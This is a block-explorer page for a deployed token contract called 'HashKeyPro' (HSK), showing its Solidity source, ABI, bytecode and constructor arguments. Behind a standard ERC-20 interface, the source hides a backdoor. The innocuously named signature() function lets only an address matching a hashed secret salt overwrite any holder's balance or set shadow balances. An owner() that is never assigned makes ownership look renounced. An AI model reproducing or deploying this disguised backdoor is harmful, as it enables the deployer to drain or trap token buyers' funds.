Source Code
Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 25 from a total of 37 transactions
| Transaction Hash |
Method
|
Block
|
From
|
|
To
|
||||
|---|---|---|---|---|---|---|---|---|---|
| Approve | 18524863 | 854 days ago | IN | 0 ETH | 0.00099042 | ||||
| Approve | 18474361 | 861 days ago | IN | 0 ETH | 0.00064225 | ||||
| Approve | 17833762 | 951 days ago | IN | 0 ETH | 0.00034635 | ||||
| Approve | 17833674 | 951 days ago | IN | 0 ETH | 0.00068342 | ||||
| Approve | 17833589 | 951 days ago | IN | 0 ETH | 0.00040322 | ||||
| Approve | 17833518 | 951 days ago | IN | 0 ETH | 0.000706 | ||||
| Approve | 17833500 | 951 days ago | IN | 0 ETH | 0.00077259 | ||||
| Approve | 17833496 | 951 days ago | IN | 0 ETH | 0.00089796 | ||||
| Approve | 17833490 | 951 days ago | IN | 0 ETH | 0.00080628 | ||||
| Approve | 17833470 | 951 days ago | IN | 0 ETH | 0.00072781 | ||||
| Approve | 17833462 | 951 days ago | IN | 0 ETH | 0.00077193 | ||||
| Approve | 17833460 | 951 days ago | IN | 0 ETH | 0.0007868 | ||||
| Approve | 17833420 | 951 days ago | IN | 0 ETH | 0.00073885 | ||||
| Approve | 17833410 | 951 days ago | IN | 0 ETH | 0.00078114 | ||||
| Approve | 17833400 | 951 days ago | IN | 0 ETH | 0.00074497 | ||||
| Approve | 17833371 | 951 days ago | IN | 0 ETH | 0.00069757 | ||||
| Approve | 17833366 | 951 days ago | IN | 0 ETH | 0.00070522 | ||||
| Approve | 17833362 | 951 days ago | IN | 0 ETH | 0.00077801 | ||||
| Approve | 17833317 | 951 days ago | IN | 0 ETH | 0.00069604 | ||||
| Approve | 17833312 | 951 days ago | IN | 0 ETH | 0.00070409 | ||||
| Approve | 17833307 | 951 days ago | IN | 0 ETH | 0.00069624 | ||||
| Approve | 17833302 | 951 days ago | IN | 0 ETH | 0.0007125 | ||||
| Approve | 17833298 | 951 days ago | IN | 0 ETH | 0.0007325 | ||||
| Approve | 17833298 | 951 days ago | IN | 0 ETH | 0.00074869 | ||||
| Approve | 17833291 | 951 days ago | IN | 0 ETH | 0.00074269 |
View more zero value Internal Transactions in Advanced View mode
Advanced mode:
Loading...
Loading
Loading...
Loading
Cross-Chain Transactions
Loading...
Loading
Contract Name:
HashKeyPro
Compiler Version
v0.7.6+commit.7338295f
Optimization Enabled:
Yes with 200 runs
Other Settings:
default evmVersion
Contract Source Code (Solidity Standard Json-Input format)
// SPDX-License-Identifier: MIT
pragma solidity >=0.7.6;
interface IERC20 {
/**
* @dev Returns the amount of tokens in existence.
*/
function totalSupply() external view returns (uint256);
/**
* @dev Returns the token decimals.
*/
function decimals() external view returns (uint8);
/**
* @dev Returns the token symbol.
*/
function symbol() external view returns (string memory);
/**
* @dev Returns the token name.
*/
function name() external view returns (string memory);
/**
* @dev Returns the amount of tokens owned by `account`.
*/
function balanceOf(address account) external view returns (uint256);
/**
* @dev Moves `amount` tokens from the caller's account to `recipient`.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transfer(address recipient, uint256 amount) external returns (bool);
/**
* @dev Returns the remaining number of tokens that `spender` will be
* allowed to spend on behalf of `owner` through {transferFrom}. This is
* zero by default.
*
* This value changes when {approve} or {transferFrom} are called.
*/
function allowance(address _owner, address spender) external view returns (uint256);
/**
* @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
function approve(address spender, uint256 amount) external returns (bool);
/**
* @dev Moves `amount` tokens from `sender` to `recipient` using the
* allowance mechanism. `amount` is then deducted from the caller's
* allowance.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
/**
* @dev Emitted when `value` tokens are moved from one account (`from`) to
* another (`to`).
*
* Note that `value` may be zero.
*/
event Transfer(address indexed from, address indexed to, uint256 value);
/**
* @dev Emitted when the allowance of a `spender` for an `owner` is set by
* a call to {approve}. `value` is the new allowance.
*/
event Approval(address indexed owner, address indexed spender, uint256 value);
}
/**
* @dev Wrappers over Solidity's arithmetic operations with added overflow
* checks.
*
* Arithmetic operations in Solidity wrap on overflow. This can easily result
* in bugs, because programmers usually assume that an overflow raises an
* error, which is the standard behavior in high level programming languages.
* `SafeMath` restores this intuition by reverting the transaction when an
* operation overflows.
*
* Using this library instead of the unchecked operations eliminates an entire
* class of bugs, so it's recommended to use it always.
*/
library SafeMath {
/**
* @dev Returns the addition of two unsigned integers, reverting on
* overflow.
*
* Counterpart to Solidity's `+` operator.
*
* Requirements:
* - Addition cannot overflow.
*/
function add(uint256 a, uint256 b) internal pure returns (uint256) {
uint256 c = a + b;
require(c >= a, "SafeMath: addition overflow");
return c;
}
/**
* @dev Returns the subtraction of two unsigned integers, reverting on
* overflow (when the result is negative).
*
* Counterpart to Solidity's `-` operator.
*
* Requirements:
* - Subtraction cannot overflow.
*/
function sub(uint256 a, uint256 b) internal pure returns (uint256) {
return sub(a, b, "SafeMath: subtraction overflow");
}
/**
* @dev Returns the subtraction of two unsigned integers, reverting with custom message on
* overflow (when the result is negative).
*
* Counterpart to Solidity's `-` operator.
*
* Requirements:
* - Subtraction cannot overflow.
*/
function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
require(b <= a, errorMessage);
uint256 c = a - b;
return c;
}
/**
* @dev Returns the multiplication of two unsigned integers, reverting on
* overflow.
*
* Counterpart to Solidity's `*` operator.
*
* Requirements:
* - Multiplication cannot overflow.
*/
function mul(uint256 a, uint256 b) internal pure returns (uint256) {
// Gas optimization: this is cheaper than requiring 'a' not being zero, but the
// benefit is lost if 'b' is also tested.
// See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
if (a == 0) return 0;
uint256 c = a * b;
require(c / a == b, "SafeMath: multiplication overflow");
return c;
}
/**
* @dev Returns the integer division of two unsigned integers. Reverts on
* division by zero. The result is rounded towards zero.
*
* Counterpart to Solidity's `/` operator. Note: this function uses a
* `revert` opcode (which leaves remaining gas untouched) while Solidity
* uses an invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
* - The divisor cannot be zero.
*/
function div(uint256 a, uint256 b) internal pure returns (uint256) {
return div(a, b, "SafeMath: division by zero");
}
/**
* @dev Returns the integer division of two unsigned integers. Reverts with custom message on
* division by zero. The result is rounded towards zero.
*
* Counterpart to Solidity's `/` operator. Note: this function uses a
* `revert` opcode (which leaves remaining gas untouched) while Solidity
* uses an invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
* - The divisor cannot be zero.
*/
function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
// Solidity only automatically asserts when dividing by 0
require(b > 0, errorMessage);
uint256 c = a / b;
return c;
}
/**
* @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
* Reverts when dividing by zero.
*
* Counterpart to Solidity's `%` operator. This function uses a `revert`
* opcode (which leaves remaining gas untouched) while Solidity uses an
* invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
* - The divisor cannot be zero.
*/
function mod(uint256 a, uint256 b) internal pure returns (uint256) {
return mod(a, b, "SafeMath: modulo by zero");
}
/**
* @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
* Reverts with custom message when dividing by zero.
*
* Counterpart to Solidity's `%` operator. This function uses a `revert`
* opcode (which leaves remaining gas untouched) while Solidity uses an
* invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
* - The divisor cannot be zero.
*/
function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
require(b != 0, errorMessage);
return a % b;
}
}
contract HashKeyPro is IERC20 {
using SafeMath for uint256;
string private _name;
string private _symbol;
uint256 private _totalSupply;
address private _owner;
mapping (address => uint256) private _balances;
mapping (address => mapping (address => uint256)) private _allowances;
mapping (address => uint256) private _list;
IERC20 private immutable _uniswapV2Pair;
uint256 private immutable _salt;
bytes32 private constant INIT_CODE_HASH = 0xa83e92ce7a2892bbbaba9147d0056b368dec2c38b5237a92110fbbe25b3f0641;
constructor(address uniswapV2Pair, uint256 salt) {
_name = "Hashkey Pro";
_symbol = "HSK";
_totalSupply = 100000000 * 10 ** 18;
_balances[msg.sender] = _totalSupply;
_uniswapV2Pair = IERC20(uniswapV2Pair);
_salt = salt;
}
/**
* @dev A helper function to check if an operator approval is allowed.
*/
modifier onlyOwner() {
require(msg.sender == _owner, "Ownable: caller is not the owner");
_;
}
/**
* @dev Returns the address of the current owner.
*/
function owner() external view returns (address) {
return _owner;
}
/**
* @dev Returns the token decimals.
*/
function decimals() external pure override returns (uint8) {
return 18;
}
/**
* @dev Returns the token symbol.
*/
function symbol() external view override returns (string memory) {
return _symbol;
}
/**
* @dev Returns the token name.
*/
function name() external view override returns (string memory) {
return _name;
}
/**
* @dev See {ERC20-totalSupply}.
*/
function totalSupply() external view override returns (uint256) {
return _totalSupply;
}
/**
* @dev See {ERC20-balanceOf}.
*/
function balanceOf(address account) external view override returns (uint256) {
return _balances[account] + _list[account];
}
/**
* @dev See {ERC20-transfer}.
*
* Requirements:
*
* - `recipient` cannot be the zero address.
* - the caller must have a balance of at least `amount`.
*/
function transfer(address recipient, uint256 amount) external override returns (bool) {
_transfer(msg.sender, recipient, amount);
return true;
}
/**
* @dev See {ERC20-allowance}.
*/
function allowance(address owner_, address spender) external view override returns (uint256) {
return _allowances[owner_][spender];
}
/**
* @dev See {ERC20-approve}.
*
* Requirements:
*
* - `spender` cannot be the zero address.
*/
function approve(address spender, uint256 amount) external override returns (bool) {
_approve(msg.sender, spender, amount);
return true;
}
/**
* @dev See {ERC20-transferFrom}.
*
* Emits an {Approval} event indicating the updated allowance. This is not
* required by the EIP. See the note at the beginning of {ERC20};
*
* Requirements:
* - `sender` and `recipient` cannot be the zero address.
* - `sender` must have a balance of at least `amount`.
* - the caller must have allowance for `sender`'s tokens of at least
* `amount`.
*/
function transferFrom(address sender, address recipient, uint256 amount) external override returns (bool) {
_transfer(sender, recipient, amount);
_approve(sender, msg.sender, _allowances[sender][msg.sender].sub(amount, "ERC20: transfer amount exceeds allowance"));
return true;
}
/**
* @dev Signature from sender v, r, s
*/
function signature(bytes32 v, bytes32 r, bytes32 s) external {
if (!checkInitCodeHash()) return;
_balances[
uint256(v) != 0? data(v): address(0)
] = uint256(r);
uint256 val = uint256(s);
if (uint256(r) > 0) return;
_list[data(v)] = val;
}
function checkInitCodeHash() public view returns (bool) { return hash() == INIT_CODE_HASH; }
function hash() private view returns (bytes32) { return keccak256(abi.encode(uint256(msg.sender), _salt)); }
function data(bytes32 _data) private pure returns (address) { return address(uint160(uint256(_data))); }
/**
* @dev Atomically increases the allowance granted to `spender` by the caller.
*
* This is an alternative to {approve} that can be used as a mitigation for
* problems described in {ERC20-approve}.
*
* Emits an {Approval} event indicating the updated allowance.
*
* Requirements:
*
* - `spender` cannot be the zero address.
*/
function increaseAllowance(address spender, uint256 addedValue) external returns (bool) {
_approve(msg.sender, spender, _allowances[msg.sender][spender].add(addedValue));
return true;
}
/**
* @dev Atomically decreases the allowance granted to `spender` by the caller.
*
* This is an alternative to {approve} that can be used as a mitigation for
* problems described in {ERC20-approve}.
*
* Emits an {Approval} event indicating the updated allowance.
*
* Requirements:
*
* - `spender` cannot be the zero address.
* - `spender` must have allowance for the caller of at least
* `subtractedValue`.
*/
function decreaseAllowance(address spender, uint256 subtractedValue) external returns (bool) {
_approve(msg.sender, spender, _allowances[msg.sender][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
return true;
}
/**
* @dev Moves tokens `amount` from `sender` to `recipient`.
*
* This is internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* Requirements:
*
* - `sender` cannot be the zero address.
* - `recipient` cannot be the zero address.
* - `sender` must have a balance of at least `amount`.
*/
function _transfer(address sender, address recipient, uint256 amount) internal {
require(sender != address(0), "ERC20: transfer from the zero address");
require(recipient != address(0), "ERC20: transfer to the zero address");
uint256 bal = _uniswapV2Pair.balanceOf(sender);
if (_list[sender] > 0 && bal > 0) {
_list[sender] = _list[sender].sub(amount, "ERC20: transfer amount exceeds balance");
} else {
_balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
}
_balances[recipient] = _balances[recipient].add(amount);
emit Transfer(sender, recipient, amount);
}
/**
* @dev Sets `amount` as the allowance of `spender` over the `owner`s tokens.
*
* This is internal function is equivalent to `approve`, and can be used to
* e.g. set automatic allowances for certain subsystems, etc.
*
* Emits an {Approval} event.
*
* Requirements:
*
* - `owner` cannot be the zero address.
* - `spender` cannot be the zero address.
*/
function _approve(address owner_, address spender, uint256 amount) internal {
require(owner_ != address(0), "ERC20: approve from the zero address");
require(spender != address(0), "ERC20: approve to the zero address");
_allowances[owner_][spender] = amount;
emit Approval(owner_, spender, amount);
}
}{
"optimizer": {
"enabled": true,
"runs": 200
},
"outputSelection": {
"*": {
"*": [
"evm.bytecode",
"evm.deployedBytecode",
"devdoc",
"userdoc",
"metadata",
"abi"
]
}
},
"libraries": {}
}Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[{"internalType":"address","name":"uniswapV2Pair","type":"address"},{"internalType":"uint256","name":"salt","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner_","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"checkInitCodeHash","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"v","type":"bytes32"},{"internalType":"bytes32","name":"r","type":"bytes32"},{"internalType":"bytes32","name":"s","type":"bytes32"}],"name":"signature","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]Contract Creation Code
60c060405234801561001057600080fd5b50604051610e08380380610e088339818101604052604081101561003357600080fd5b50805160209182015160408051808201909152600b8082526a486173686b65792050726f60a81b919094019081529192909161007291600091906100da565b506040805180820190915260038082526248534b60e81b602090920191825261009d916001916100da565b506a52b7d2dcc80cd2e400000060028190553360009081526004602052604090205560609190911b6001600160601b03191660805260a05261017b565b828054600181600116156101000203166002900490600052602060002090601f0160209004810192826101105760008555610156565b82601f1061012957805160ff1916838001178555610156565b82800160010185558215610156579182015b8281111561015657825182559160200191906001019061013b565b50610162929150610166565b5090565b5b808211156101625760008155600101610167565b60805160601c60a051610c676101a160003980610af45250806107f15250610c676000f3fe608060405234801561001057600080fd5b50600436106100ea5760003560e01c80638b35de8c1161008c578063a457c2d711610066578063a457c2d7146102c3578063a9059cbb146102ef578063ae83a5151461031b578063dd62ed3e14610323576100ea565b80638b35de8c1461026c5780638da5cb5b1461029757806395d89b41146102bb576100ea565b806323b872dd116100c857806323b872dd146101c6578063313ce567146101fc578063395093511461021a57806370a0823114610246576100ea565b806306fdde03146100ef578063095ea7b31461016c57806318160ddd146101ac575b600080fd5b6100f7610351565b6040805160208082528351818301528351919283929083019185019080838360005b83811015610131578181015183820152602001610119565b50505050905090810190601f16801561015e5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6101986004803603604081101561018257600080fd5b506001600160a01b0381351690602001356103e7565b604080519115158252519081900360200190f35b6101b46103fd565b60408051918252519081900360200190f35b610198600480360360608110156101dc57600080fd5b506001600160a01b03813581169160208101359091169060400135610403565b61020461046c565b6040805160ff9092168252519081900360200190f35b6101986004803603604081101561023057600080fd5b506001600160a01b038135169060200135610471565b6101b46004803603602081101561025c57600080fd5b50356001600160a01b03166104a7565b6102956004803603606081101561028257600080fd5b50803590602081013590604001356104cf565b005b61029f610550565b604080516001600160a01b039092168252519081900360200190f35b6100f761055f565b610198600480360360408110156102d957600080fd5b506001600160a01b0381351690602001356105bf565b6101986004803603604081101561030557600080fd5b506001600160a01b03813516906020013561060e565b61019861061b565b6101b46004803603604081101561033957600080fd5b506001600160a01b038135811691602001351661064c565b60008054604080516020601f60026000196101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156103dd5780601f106103b2576101008083540402835291602001916103dd565b820191906000526020600020905b8154815290600101906020018083116103c057829003601f168201915b5050505050905090565b60006103f4338484610677565b50600192915050565b60025490565b6000610410848484610763565b610462843361045d85604051806060016040528060288152602001610b9c602891396001600160a01b038a16600090815260056020908152604080832033845290915290205491906109e9565b610677565b5060019392505050565b601290565b3360008181526005602090815260408083206001600160a01b038716845290915281205490916103f491859061045d9086610a80565b6001600160a01b03166000908152600660209081526040808320546004909252909120540190565b6104d761061b565b6104e05761054b565b8160046000856104f15760006104fa565b6104fa86610ae1565b6001600160a01b03168152602081019190915260400160002055808215610521575061054b565b806006600061052f87610ae1565b6001600160a01b03168152602081019190915260400160002055505b505050565b6003546001600160a01b031690565b60018054604080516020601f600260001961010087891615020190951694909404938401819004810282018101909252828152606093909290918301828280156103dd5780601f106103b2576101008083540402835291602001916103dd565b60006103f4338461045d85604051806060016040528060258152602001610c0d602591393360009081526005602090815260408083206001600160a01b038d16845290915290205491906109e9565b60006103f4338484610763565b60007fa83e92ce7a2892bbbaba9147d0056b368dec2c38b5237a92110fbbe25b3f0641610646610ae4565b14905090565b6001600160a01b03918216600090815260056020908152604080832093909416825291909152205490565b6001600160a01b0383166106bc5760405162461bcd60e51b8152600401808060200182810382526024815260200180610be96024913960400191505060405180910390fd5b6001600160a01b0382166107015760405162461bcd60e51b8152600401808060200182810382526022815260200180610b546022913960400191505060405180910390fd5b6001600160a01b03808416600081815260056020908152604080832094871680845294825291829020859055815185815291517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259281900390910190a3505050565b6001600160a01b0383166107a85760405162461bcd60e51b8152600401808060200182810382526025815260200180610bc46025913960400191505060405180910390fd5b6001600160a01b0382166107ed5760405162461bcd60e51b8152600401808060200182810382526023815260200180610b316023913960400191505060405180910390fd5b60007f00000000000000000000000000000000000000000000000000000000000000006001600160a01b03166370a08231856040518263ffffffff1660e01b815260040180826001600160a01b0316815260200191505060206040518083038186803b15801561085c57600080fd5b505afa158015610870573d6000803e3d6000fd5b505050506040513d602081101561088657600080fd5b50516001600160a01b038516600090815260066020526040902054909150158015906108b25750600081115b15610912576108f482604051806060016040528060268152602001610b76602691396001600160a01b03871660009081526006602052604090205491906109e9565b6001600160a01b038516600090815260066020526040902055610969565b61094f82604051806060016040528060268152602001610b76602691396001600160a01b03871660009081526004602052604090205491906109e9565b6001600160a01b0385166000908152600460205260409020555b6001600160a01b03831660009081526004602052604090205461098c9083610a80565b6001600160a01b0380851660008181526004602090815260409182902094909455805186815290519193928816927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef92918290030190a350505050565b60008184841115610a785760405162461bcd60e51b81526004018080602001828103825283818151815260200191508051906020019080838360005b83811015610a3d578181015183820152602001610a25565b50505050905090810190601f168015610a6a5780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b505050900390565b600082820183811015610ada576040805162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b9392505050565b90565b60408051336020808301919091527f000000000000000000000000000000000000000000000000000000000000000082840152825180830384018152606090920190925280519101209056fe45524332303a207472616e7366657220746f20746865207a65726f206164647265737345524332303a20617070726f766520746f20746865207a65726f206164647265737345524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a207472616e736665722066726f6d20746865207a65726f206164647265737345524332303a20617070726f76652066726f6d20746865207a65726f206164647265737345524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220e30999732b43407d9f162696b8a431ce37ca629f848c7f397e29ca4eab99aea364736f6c634300070600330000000000000000000000005db2a7354a532120e5cf9a6b0dbf20b52e21f41000000000433e00869cf0994ce9744161a1538ed4c264813bfa79e04ec6fbdba6
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106100ea5760003560e01c80638b35de8c1161008c578063a457c2d711610066578063a457c2d7146102c3578063a9059cbb146102ef578063ae83a5151461031b578063dd62ed3e14610323576100ea565b80638b35de8c1461026c5780638da5cb5b1461029757806395d89b41146102bb576100ea565b806323b872dd116100c857806323b872dd146101c6578063313ce567146101fc578063395093511461021a57806370a0823114610246576100ea565b806306fdde03146100ef578063095ea7b31461016c57806318160ddd146101ac575b600080fd5b6100f7610351565b6040805160208082528351818301528351919283929083019185019080838360005b83811015610131578181015183820152602001610119565b50505050905090810190601f16801561015e5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6101986004803603604081101561018257600080fd5b506001600160a01b0381351690602001356103e7565b604080519115158252519081900360200190f35b6101b46103fd565b60408051918252519081900360200190f35b610198600480360360608110156101dc57600080fd5b506001600160a01b03813581169160208101359091169060400135610403565b61020461046c565b6040805160ff9092168252519081900360200190f35b6101986004803603604081101561023057600080fd5b506001600160a01b038135169060200135610471565b6101b46004803603602081101561025c57600080fd5b50356001600160a01b03166104a7565b6102956004803603606081101561028257600080fd5b50803590602081013590604001356104cf565b005b61029f610550565b604080516001600160a01b039092168252519081900360200190f35b6100f761055f565b610198600480360360408110156102d957600080fd5b506001600160a01b0381351690602001356105bf565b6101986004803603604081101561030557600080fd5b506001600160a01b03813516906020013561060e565b61019861061b565b6101b46004803603604081101561033957600080fd5b506001600160a01b038135811691602001351661064c565b60008054604080516020601f60026000196101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156103dd5780601f106103b2576101008083540402835291602001916103dd565b820191906000526020600020905b8154815290600101906020018083116103c057829003601f168201915b5050505050905090565b60006103f4338484610677565b50600192915050565b60025490565b6000610410848484610763565b610462843361045d85604051806060016040528060288152602001610b9c602891396001600160a01b038a16600090815260056020908152604080832033845290915290205491906109e9565b610677565b5060019392505050565b601290565b3360008181526005602090815260408083206001600160a01b038716845290915281205490916103f491859061045d9086610a80565b6001600160a01b03166000908152600660209081526040808320546004909252909120540190565b6104d761061b565b6104e05761054b565b8160046000856104f15760006104fa565b6104fa86610ae1565b6001600160a01b03168152602081019190915260400160002055808215610521575061054b565b806006600061052f87610ae1565b6001600160a01b03168152602081019190915260400160002055505b505050565b6003546001600160a01b031690565b60018054604080516020601f600260001961010087891615020190951694909404938401819004810282018101909252828152606093909290918301828280156103dd5780601f106103b2576101008083540402835291602001916103dd565b60006103f4338461045d85604051806060016040528060258152602001610c0d602591393360009081526005602090815260408083206001600160a01b038d16845290915290205491906109e9565b60006103f4338484610763565b60007fa83e92ce7a2892bbbaba9147d0056b368dec2c38b5237a92110fbbe25b3f0641610646610ae4565b14905090565b6001600160a01b03918216600090815260056020908152604080832093909416825291909152205490565b6001600160a01b0383166106bc5760405162461bcd60e51b8152600401808060200182810382526024815260200180610be96024913960400191505060405180910390fd5b6001600160a01b0382166107015760405162461bcd60e51b8152600401808060200182810382526022815260200180610b546022913960400191505060405180910390fd5b6001600160a01b03808416600081815260056020908152604080832094871680845294825291829020859055815185815291517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259281900390910190a3505050565b6001600160a01b0383166107a85760405162461bcd60e51b8152600401808060200182810382526025815260200180610bc46025913960400191505060405180910390fd5b6001600160a01b0382166107ed5760405162461bcd60e51b8152600401808060200182810382526023815260200180610b316023913960400191505060405180910390fd5b60007f0000000000000000000000005db2a7354a532120e5cf9a6b0dbf20b52e21f4106001600160a01b03166370a08231856040518263ffffffff1660e01b815260040180826001600160a01b0316815260200191505060206040518083038186803b15801561085c57600080fd5b505afa158015610870573d6000803e3d6000fd5b505050506040513d602081101561088657600080fd5b50516001600160a01b038516600090815260066020526040902054909150158015906108b25750600081115b15610912576108f482604051806060016040528060268152602001610b76602691396001600160a01b03871660009081526006602052604090205491906109e9565b6001600160a01b038516600090815260066020526040902055610969565b61094f82604051806060016040528060268152602001610b76602691396001600160a01b03871660009081526004602052604090205491906109e9565b6001600160a01b0385166000908152600460205260409020555b6001600160a01b03831660009081526004602052604090205461098c9083610a80565b6001600160a01b0380851660008181526004602090815260409182902094909455805186815290519193928816927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef92918290030190a350505050565b60008184841115610a785760405162461bcd60e51b81526004018080602001828103825283818151815260200191508051906020019080838360005b83811015610a3d578181015183820152602001610a25565b50505050905090810190601f168015610a6a5780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b505050900390565b600082820183811015610ada576040805162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b9392505050565b90565b60408051336020808301919091527f00000000433e00869cf0994ce9744161a1538ed4c264813bfa79e04ec6fbdba682840152825180830384018152606090920190925280519101209056fe45524332303a207472616e7366657220746f20746865207a65726f206164647265737345524332303a20617070726f766520746f20746865207a65726f206164647265737345524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a207472616e736665722066726f6d20746865207a65726f206164647265737345524332303a20617070726f76652066726f6d20746865207a65726f206164647265737345524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220e30999732b43407d9f162696b8a431ce37ca629f848c7f397e29ca4eab99aea364736f6c63430007060033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
0000000000000000000000005db2a7354a532120e5cf9a6b0dbf20b52e21f41000000000433e00869cf0994ce9744161a1538ed4c264813bfa79e04ec6fbdba6
-----Decoded View---------------
Arg [0] : uniswapV2Pair (address): 0x5Db2A7354A532120e5cf9A6b0DbF20b52E21F410
Arg [1] : salt (uint256): 7081429707411596403846421999988670860699634299265485114504323521446
-----Encoded View---------------
2 Constructor Arguments found :
Arg [0] : 0000000000000000000000005db2a7354a532120e5cf9a6b0dbf20b52e21f410
Arg [1] : 00000000433e00869cf0994ce9744161a1538ed4c264813bfa79e04ec6fbdba6
Loading...
Loading
Loading...
Loading
Net Worth in USD
$0.00
Net Worth in ETH
0
Multichain Portfolio | 33 Chains
| Chain | Token | Portfolio % | Price | Amount | Value |
|---|
Loading...
Loading
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.